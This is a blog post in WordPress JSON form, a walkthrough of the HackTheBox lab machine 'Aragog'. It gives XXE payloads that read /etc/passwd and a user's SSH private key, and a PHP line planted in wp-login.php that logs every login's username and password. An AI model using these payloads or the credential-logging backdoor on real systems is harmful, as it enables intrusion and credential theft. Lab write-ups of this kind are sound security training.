{"id":401,"date":"2020-07-21T09:20:39","date_gmt":"2020-07-21T09:20:39","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=401"},"modified":"2021-01-01T14:03:23","modified_gmt":"2021-01-01T14:03:23","slug":"aragog-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/aragog-hackthebox-walkthrough\/","title":{"rendered":"Aragog Hackthebox walkthrough"},"content":{"rendered":"\n<p class=\"has-drop-cap\">Hey Everyone! Here is another cool machine from hackthebox and its named Aragog! Its a medium level linux machine exploiting one of the owasp top 10 vulnerability. Let&#8217;s dive deep to find out the how the box gets pwned.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>The initial foothold is based on exploiting the way the server parses the xml data therefore leading to <strong>XXE.<\/strong> The privilege escalation to root is based upon how password logging can be done via creating a <strong>php backdoor in wordpress<\/strong>.<\/p>\n\n\n\n<p>With all that said, lets get started!!<\/p>\n\n\n\n<p>Starting with nmap scan<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background scroll\">&nbsp;\u26a1root@kali$~\/Desktop\/htb\/aragog&gt; cat aragog.nmap &nbsp;&nbsp;&nbsp; &nbsp;# Nmap 7.70 scan initiated Sat Jul 18 19:30:47 2020 as: nmap -sC -sV -o aragog.nmap 10.10.10.78\nNmap scan report for 10.10.10.78\nHost is up (0.27s latency).\nNot shown: 997 closed ports\nPORT &nbsp; STATE SERVICE VERSION\n21\/tcp open&nbsp; ftp &nbsp;&nbsp;&nbsp; vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-r--r--r--&nbsp;&nbsp;&nbsp; 1 ftp&nbsp; &nbsp;&nbsp;&nbsp; ftp&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; 86 Dec 21&nbsp; 2017 test.txt\n| ftp-syst:\n| &nbsp; STAT:\n| FTP server status:\n|&nbsp; &nbsp;&nbsp;&nbsp; Connected to ::ffff:10.10.14.2\n|&nbsp; &nbsp;&nbsp;&nbsp; Logged in as ftp\n|&nbsp; &nbsp;&nbsp;&nbsp; TYPE: ASCII\n|&nbsp; &nbsp;&nbsp;&nbsp; No session bandwidth limit\n|&nbsp; &nbsp;&nbsp;&nbsp; Session timeout in seconds is 300\n|&nbsp; &nbsp;&nbsp;&nbsp; Control connection is plain text\n|&nbsp; &nbsp;&nbsp;&nbsp; Data connections will be plain text\n|&nbsp; &nbsp;&nbsp;&nbsp; At session startup, client count was 2\n|&nbsp; &nbsp;&nbsp;&nbsp; vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open&nbsp; ssh &nbsp;&nbsp;&nbsp; OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| &nbsp; 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)\n| &nbsp; 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)\n|_&nbsp; 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)\n80\/tcp open&nbsp; http&nbsp;&nbsp;&nbsp; Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sat Jul 18 19:31:08 2020 -- 1 IP address (1 host up) scanned in 21.76 seconds<\/pre>\n\n\n\n<p>There was ftp open with allowed anonymous login. So I quickly fired up ftp to see the contents. There was a file test.txt that i downloaded on my local machine.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background scroll\">root@kali&nbsp; ~\/Desktop\/htb\/aragog &nbsp; master&nbsp; ftp 10.10.10.78Connected to 10.10.10.78.\n220 (vsFTPd 3.0.3)\nName (10.10.10.78:root): anonymous\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; dir\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-r--r--r--&nbsp;&nbsp;&nbsp; 1 ftp&nbsp; &nbsp;&nbsp;&nbsp; ftp&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; 86 Dec 21&nbsp; 2017 test.txt\n226 Directory send OK.\nftp&gt; get test.txt\nlocal: test.txt remote: test.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for test.txt (86 bytes).\n226 Transfer complete.\n86 bytes received in 0.00 secs (1.4141 MB\/s)<\/pre>\n\n\n\n<p>Contents of test.txt<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&nbsp;\u26a1root@kali$~\/Desktop\/htb\/aragog&gt; cat test.txt&nbsp;&nbsp;&nbsp;&lt;details&gt;\n&nbsp;&nbsp;&nbsp; &lt;subnet_mask&gt;255.255.255.192&lt;\/subnet_mask&gt;\n&nbsp;&nbsp;&nbsp; &lt;test&gt;&lt;\/test&gt;\n&lt;\/details&gt;<\/pre>\n\n\n\n<p>As of now the contents of file dont&nbsp; make any sense. So just made the note of file.&nbsp;<\/p>\n\n\n\n<p>Moving ahead!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial Foothold<\/h2>\n\n\n\n<p>Started up a gobuster scan as port 80 was open<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u http:\/\/10.10.10.68 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -t 50 -x php<\/pre>\n\n\n\n<p>Got a file hosts.php<\/p>\n\n\n\n<p>On page <a href=\"http:\/\/10.10.10.78\/hosts.php\">http:\/\/10.10.10.78\/hosts.php<\/a>, a page landed<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/5KQVelZm2BYalwjtuz5exnXQqBtYkRgxdhz45DECePbHkFsgwfQMZDnibN0Yz84Qnlf0cpHOMf4nARQRdlIPnFhBeE4-y_WEGCFbsTG--kwFu92GAEpizB1p0gwNmzoPjYw_VNb9\" alt=\"\"\/><\/figure>\n\n\n\n<p>So that is a vague information, but seems like some sort of hosts calculation. So I captured the request in burp and added the contents of test.txt obtained earlier.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/oqtEPWpnHbswfFis1FiH-j2nIKAw7FGhrL5SegotsLLvmGEo2VnwBM0Df5lqCDmMbr4urDq1mbHY-7bec2fpQqL7E0IsgaeOnoftKzZy17WhpCX-2G4kCyb-ck54PSXzdJ0tMsI4\" alt=\"\"\/><\/figure>\n\n\n\n<p>Cool !! It is calculation hosts based on the subnet mask provided. But an interesting thing to look it that request is containing xml. So the only thing that comes to mind is XXE!!<\/p>\n\n\n\n<p>I googled for <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/XXE%20Injection\" target=\"_blank\"><span class=\"has-inline-color has-vivid-cyan-blue-color\">payloadallthethings<\/span><\/a>  crafted a payload to see if i am able to retrieve the contents of local files such as <strong>\/etc\/passwd<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;?xml version=\"1.0\"?&gt;&lt;!DOCTYPE test [&lt;!ENTITY test1 SYSTEM 'file:\/\/\/etc\/passwd'&gt;]&gt;\n&lt;details&gt;\n&nbsp;&nbsp;&nbsp; &lt;subnet_mask&gt;&amp;test1;&lt;\/subnet_mask&gt;\n&nbsp;&nbsp;&nbsp; &lt;test&gt;&lt;\/test&gt;\n&lt;\/details&gt;<\/pre>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/97r4FmcJ_7soz0pKxAp55YHCib9gggp1dC0fBDHPgQs6WmJEACgeKOQ6z2MWlVJJN3PSwlgNsvvCrt-tVO1Kg6mEqJG0nYFexAU9ab4mpKqZ0E0FtmfS3NitSba7hrmyvebR_Rqt\" alt=\"\" width=\"706\" height=\"227\"\/><\/figure>\n\n\n\n<p>Awesome! The contents are visible and I could see 2 users listed florian and cliff. As a next step, I tried to grep any id_rsa files if present.<\/p>\n\n\n\n<p>\/home\/cliff\/.ssh\/id_rsa didnt worked out but \/home\/florian\/.ssh\/id_rsa worked like a charm and now I have the RSA private key.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;?xml version=\"1.0\"?&gt;&lt;!DOCTYPE test [&lt;!ENTITY test1 SYSTEM 'file:\/\/\/home\/florian\/.ssh\/id_rsa'&gt;]&gt;\n&lt;details&gt;\n&nbsp;&nbsp;&nbsp; &lt;subnet_mask&gt;&amp;test1;&lt;\/subnet_mask&gt;\n&nbsp;&nbsp;&nbsp; &lt;test&gt;&lt;\/test&gt;\n&lt;\/details&gt;&nbsp;&nbsp;&nbsp;<\/pre>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/167-7ACP1fm3OOLA4FoswKlovGdIjNWWolWMn5vZT47wp-ZJ9wRvMP59svzWhnT1KJcMxH431uC9kc6RfVeeHKc0oZd_eeNxU1RJK2DOePOVKXqPAjoP4fIJlwCTjVwuKFiNioNG\" alt=\"\" width=\"730\" height=\"316\"\/><\/figure>\n\n\n\n<p>I then logged in with florian<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># chmod 600 id_rsa\n# ssh -i id_rsa florian@10.10.10.78\n# cat user.txt&nbsp;<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/PVqv4q0fguGiuevKYGbAin4T8srK_FOlo4es5TEIsclp4IUxEIk7-03m0y6k7zRHbn5rG3cuPX3BRhmp1r5dW_s__8JVK9XhPc2Sz5eA_WS0otX_x1eNLevtD7HQtEiiP13T2mp8\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege escalation!!<\/h2>\n\n\n\n<p>I uploaded LinEnum.sh to the box and enumerated and surprisingly there were a lot of wordpress files present. There was a folder dev_wiki that had the wordpress installed but didnt got enumerated in the gobuster scan. There are a lots of enumeration results that can lead you to wrong direction like password of database in wp-config file. Yes you are definitely gonna find the administrator password hash in the tables, but its simply uncrackable.&nbsp;<\/p>\n\n\n\n<p>After listing the contents of dev_wiki, I found out that it was world writable.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/WmU6e2JWHmPZ5HBT4iHa3ZQtNfigs29CTn5sFnww6njmGKAwIcudQKkXH7bt6iiYNA9OeYxgA2ye6QZcSZKr4-n49rMpcofh20EkpDhsINr9NUjgb4oB6Sqdhsrk8ABd08U2J0wD\" alt=\"\"\/><\/figure>\n\n\n\n<p>So I went to <strong>http:\/\/aragog\/dev_wiki <\/strong>to find out any useful information. Do an entry in <strong>\/etc\/hosts<\/strong> as <strong>10.10.10.78<\/strong>&nbsp; aragog so that the page can be fully rendered (ps: there&#8217;s virtual routing).<\/p>\n\n\n\n<p>I found a blog by <strong>Administrator<\/strong>. Here the user cliff has administrator privileges. Also he writes that he\u2019ll be logging in regularly, which means that his password can be sniffed using a backdoor in WordPress.<\/p>\n\n\n\n<p>Let\u2019s see how we can make one<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/cp2sD8V0NzKjkkZzlD5vTHdDst3gO0usre4P9Tu7fq4q-L2tFK94tT7YckHtnUuIMoXBT3bu-HI5Yie704AZIaPyPiO9TXcqPEw1BHJBiXQWeu8g4xiBPOHYiCCaS_YcwTQqglgu\" alt=\"\"\/><\/figure>\n\n\n\n<p>Open <strong>wp-login.php<\/strong> under <strong>dev_wiki<\/strong> and under the switch operation: login add the following line. The code is gonna create a file named <strong>.passwords<\/strong> and will store the username and password as anyone logs in. Since we read in the blog earlier, that cliff will be logging in regularly, we will end up getting his password.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/sEYf2q1_ydL9xe3Q7nhck5DkPlcXNTQyxcApLRBIvwpUX8_vx3gNYNreAWklYpmqGgIUvmFZkIG8lglWCf68beVZoSF1IdBmyz9s2ZybeOZ5qmVg_736V5V-SvouNh1pejISKbLy\" alt=\"\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">file_put_contents(\".passwords\", $_POST['log']. \":\". $_POST['pwd']. \"\\n\", FILE_APPEND);<\/pre>\n\n\n\n<p>Here\u2019s the dummy request to check if out payload is working fine or not ( the step is optional)<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/P1IYwh9kUM0rnjs1vXnyzfapOCVHoPvG1wrbFEZkkmqHVPTGCQIQym--t1t1HjUZVNII3rTtyHmrn7wfgUzPwwA-BF_IRAq3fwu36eNSH14RTB89axMKYKtGfmno8GJnbYT_lNUw\" alt=\"\" width=\"705\" height=\"199\"\/><\/figure>\n\n\n\n<p>So A new file has been created.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/A1_HqercS3BUYyQKKLdWPKzJHBTq3i2QVUe8aJ4p_s8igIS4qfYXAMo_LjzKwkr37ItB_3wwqAIJHO6T1aIstbwfaQXzwvWR9ucYvN6rs73NanbBPaHnYR93SQwAeBFhBYjWJZsb\" alt=\"\"\/><\/figure>\n\n\n\n<p>Lets grab the contents<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/Iko-qOX7Ex7c_o56fzi7dMQnt_0wveHSHGO4VAGb9uKbo2g9q7HZR27CShgjy-rDXYGW-NtI0FUvQofQUSvqXnLEOSDcyVsJ7PPWZGgNr4DmtbGvI4Fd1GMf-mjlqZYaX3knlUr3\" alt=\"\"\/><\/figure>\n\n\n\n<p>Amazing we found the password!<\/p>\n\n\n\n<p><strong>Administrator:!KRgYs(JFO!&amp;MTr)lf<\/strong><\/p>\n\n\n\n<p>So lets try out the password with different accounts like cliff\/root. And it worked with root!! (As the users have the habit of reusing passwords!)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/5TKyp9r2Sw3f1UK_SeWUR8D4lWqShDyvIq5MwpEdHbuVnBVnEGAhXgKAMULvxoTP0TIhRsMX11s3rXzOoxJL6V3_OTRnvrS6lobhnaJF12UIEscWvssAB0AK2z0DutkLkJ96zZZP\" alt=\"\"\/><\/figure>\n\n\n\n<p>The privilege escalation of the box is totally based upon real world situations where users tend to use same passwords at multiple places that should be totally avoided. Passwords should always be built of random characters and should stored in a trusted password manager. <\/p>\n\n\n\n<p>Thats all for the blog post! Thanks for reading!!<br>\nSee you in the next one ! Until then, happy hunting \ud83d\ude42<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aragog is a medium level linux machine from hackthebox. Initial foothold is based on exploiting XXE and the privilege escalation requires to log the password by creating a backdoor.<\/p>\n","protected":false},"author":1,"featured_media":408,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[234,26,54,236,226,126,60,235,233],"class_list":["post-401","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-aragog","tag-hackthebox","tag-htb","tag-password-logging","tag-penetration-testing","tag-php","tag-privilege-escaltion","tag-wordpress","tag-xxe","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=401"}],"version-history":[{"count":4,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401\/revisions"}],"predecessor-version":[{"id":531,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401\/revisions\/531"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/408"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=401"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=401"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=401"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}